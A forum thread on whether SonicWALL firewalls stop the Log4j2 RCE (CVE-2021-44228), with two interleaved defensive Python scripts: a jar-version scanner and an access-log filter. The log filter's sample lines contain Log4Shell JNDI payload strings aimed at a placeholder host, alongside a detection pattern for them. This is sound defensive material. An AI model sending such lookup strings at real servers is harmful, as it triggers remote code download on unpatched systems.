Will SonicWALL Firewalls work against Apache Log4j2 Remote Code Execution CVE-2021-44228?
May I know whether SonicWALL firewalls will work against the latest Apache vulnerability, Apache Log4j2 Remote Code Execution CVE-2021-44228?
Are there any mitigation steps/plan from SonicWALL for this vulnerability?
""On Dec. 9, 2021, a remote code execution (RCE) vulnerability in Apache log4j 2 was identified being exploited in the wild. Public proof of concept (PoC) code was released, and subsequent investigation revealed that exploitation was incredibly easy to perform. By submitting a specially crafted request to a vulnerable system, depending on how the system is configured, an attacker is able to instruct that system to download and subsequently execute a malicious payload. Due to the discovery of this exploit being so recent, there are still many servers, both on-premises and within cloud environments, that have yet to be patched. Like many high severity RCE exploits, thus far, massive scanning activity for CVE-2021-44228 has begun on the internet with the intent of seeking out and exploiting unpatched systems. We highly recommend that organizations upgrade to the latest version (2.15.0-rc2) of Apache log4j 2 for all systems.""
@Ajishlal - Does this answer your question?
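The quoted advisory's only mitigation is to upgrade log4j 2 on every system, which means first finding which jars on a host actually carry a vulnerable log4j-core. The script below is an added example for that inventory step; it is not code from this thread, from SonicWALL, or from the Log4j project. It assumes that a log4j-core jar states its version in the `Implementation-Version` manifest attribute and that the presence of `JndiLookup.class` is what makes a build exposed; the fixed-version floor is a parameter that defaults to the 2.15.0 the advisory names, and the sample jars it checks are constructed in memory.

```python
import io
import os
import re
import zipfile
from dataclasses import dataclass
from pathlib import Path
from typing import Iterator, Optional, Tuple

# Class that implements the JNDI lookup abused by CVE-2021-44228.
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
# Package prefix that identifies a log4j-core jar (assumption used for classification).
LOG4J_CORE_PREFIX = "org/apache/logging/log4j/core/"
# Version floor taken from the advisory quoted in the thread; pass your own if it changes.
DEFAULT_MIN_FIXED = "2.15.0"


@dataclass
class Finding:
    path: str
    version: Optional[str]
    has_jndi_lookup: bool
    vulnerable: bool


def parse_version(text: str) -> Optional[Tuple[int, int, int]]:
    """Turn '2.15.0-rc2' into (2, 15, 0); pre-release suffixes are ignored."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", text)
    return tuple(int(x) for x in m.groups()) if m else None


def manifest_version(zf: zipfile.ZipFile) -> Optional[str]:
    """Read Implementation-Version from META-INF/MANIFEST.MF, if present."""
    try:
        raw = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
    except KeyError:
        return None
    for line in raw.splitlines():
        if line.startswith("Implementation-Version:"):
            return line.split(":", 1)[1].strip()
    return None


def assess_jar(path: str, data: Optional[bytes] = None,
               min_fixed: str = DEFAULT_MIN_FIXED) -> Optional[Finding]:
    """Classify one jar. Returns None when the jar is not log4j-core at all."""
    src = io.BytesIO(data) if data is not None else path
    with zipfile.ZipFile(src) as zf:
        names = set(zf.namelist())
        is_core = any(n.startswith(LOG4J_CORE_PREFIX) for n in names)
        has_lookup = JNDI_LOOKUP_CLASS in names
        version = manifest_version(zf)
    if not is_core:
        return None
    parsed = parse_version(version) if version else None
    floor = parse_version(min_fixed)
    # Exposed when the lookup class ships and the version is unknown or below the floor.
    vulnerable = has_lookup and (parsed is None or parsed < floor)
    return Finding(path, version, has_lookup, vulnerable)


def scan_tree(root: str, min_fixed: str = DEFAULT_MIN_FIXED) -> Iterator[Finding]:
    """Walk a directory and yield a Finding for every log4j-core jar/war found."""
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith((".jar", ".war")):
                full = str(Path(dirpath) / name)
                try:
                    f = assess_jar(full, min_fixed=min_fixed)
                except zipfile.BadZipFile:
                    continue  # not a real archive; skip rather than abort the scan
                if f is not None:
                    yield f


def build_sample_jar(version: str, include_lookup: bool) -> bytes:
    """Constructed test fixture: a minimal jar that looks like log4j-core."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF",
                    f"Manifest-Version: 1.0\nImplementation-Version: {version}\n")
        zf.writestr(LOG4J_CORE_PREFIX + "Logger.class", b"")
        if include_lookup:
            zf.writestr(JNDI_LOOKUP_CLASS, b"")
    return buf.getvalue()


if __name__ == "__main__":
    # Demonstrate on constructed jars; point scan_tree() at a real path on a host.
    for label, data in (("old", build_sample_jar("2.14.1", True)),
                        ("fixed", build_sample_jar("2.15.0-rc2", True))):
        print(label, assess_jar(f"{label}.jar", data))
```

`scan_tree()` is what you would run on a server; `build_sample_jar()` exists only so the check can be exercised offline. Jars nested inside wars or fat jars are not opened recursively here, so a clean result from this script alone does not prove a host is patched.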
As per my Firewall Threat Report, IPS is preventing the Apache Log4j remote code execution attack.
Hmmm, this must be a TZ series "feature" of which I was never aware.
All the devices in my fleet have AGSS subscriptions.
However, it appears that none of them report on anything except Multimedia. Virus, Intrusions, Spyware - all zero for the past 21 days.
Now I'm wondering, what's going on. Is it possible that the Bergen County, NJ ISPs are really that good at preventing downstream stuff from hitting?
The above report/feature is from an NSa 9250 with AGSS.
Getting more hits.
Overall, whether you see this in the graph or not is really based on the percentages of how many times the exploit is being attempted. If you have so many others, it doesn't qualify as a "Top Intrusion" that shows up on the list. I can certainly filter in the logs for it and see when it happens on our networks.
I've also done remote scans for affected devices with Nessus and the firewall blocks all the attempts of the exploit and detection with the scanner. Looks like the SonicWalls are doing their jobs, which is nice. 💪
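The post above notes that whether an exploit attempt shows up in the Top Intrusions graph depends on its share of total events, and that the reliable way to see it is to filter the logs. The script below is an added example of such a filter over web-server access logs; it is not code from this thread, from SonicWALL, or from Nessus. It assumes Apache/nginx combined log format, looks for the `${jndi:` lookup string in the request line, referer and user-agent fields after percent-decoding, and runs over a few constructed sample lines (documentation-range IPs and a `.invalid` callback host).

```python
import re
from collections import Counter
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional
from urllib.parse import unquote

# Combined log format: ip ident user [time] "request" status size "referer" "user-agent".
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
# The lookup prefix that triggers CVE-2021-44228, matched case-insensitively.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


@dataclass
class Hit:
    client: str
    timestamp: str
    field: str      # which log field carried the string
    evidence: str   # the decoded field value


def normalize(value: str) -> str:
    """Percent-decode up to twice; servers log the raw, still-encoded request line."""
    out = value
    for _ in range(2):
        decoded = unquote(out)
        if decoded == out:
            break
        out = decoded
    return out


def inspect_line(line: str) -> Optional[Hit]:
    """Return a Hit if any inspected field contains a JNDI lookup, else None."""
    m = COMBINED_RE.match(line)
    if not m:
        return None  # not combined format; a real deployment would log and skip
    for field in ("request", "referer", "ua"):
        value = normalize(m.group(field))
        if JNDI_RE.search(value):
            return Hit(m.group("ip"), m.group("ts"), field, value)
    return None


def scan_lines(lines: Iterable[str]) -> List[Hit]:
    return [h for h in (inspect_line(l) for l in lines) if h is not None]


def count_by_client(hits: Iterable[Hit]) -> Dict[str, int]:
    """Attempts per source address, the view a 'Top Intrusions' graph summarises."""
    return dict(Counter(h.client for h in hits))


# Constructed sample lines; the callback host is a placeholder, not a real IoC.
SAMPLE_LOG = [
    '198.51.100.10 - - [10/Dec/2021:10:15:32 +0000] "GET /index.html HTTP/1.1" '
    '200 1043 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Dec/2021:10:16:01 +0000] "GET / HTTP/1.1" '
    '200 1043 "-" "${jndi:ldap://callback.invalid/a}"',
    '203.0.113.9 - - [10/Dec/2021:10:17:45 +0000] "GET /search?q=%24%7Bjndi%3Aldap%3A%2F%2F'
    'callback.invalid%2Fa%7D HTTP/1.1" 404 196 "-" "curl/7.79.1"',
    '203.0.113.7 - - [10/Dec/2021:10:18:02 +0000] "GET /login HTTP/1.1" '
    '200 512 "${JnDi:rmi://callback.invalid/b}" "Mozilla/5.0"',
]

if __name__ == "__main__":
    hits = scan_lines(SAMPLE_LOG)
    for h in hits:
        print(f"{h.timestamp} {h.client} [{h.field}] {h.evidence}")
    print(count_by_client(hits))
```

Feed it `sys.stdin` or an open file instead of `SAMPLE_LOG` to run over real access logs. This only matches the plain lookup prefix after decoding; an IPS signature set such as the one the firewall applied here covers more encodings, so treat a zero result from this script as a quick triage, not proof that nothing reached the host.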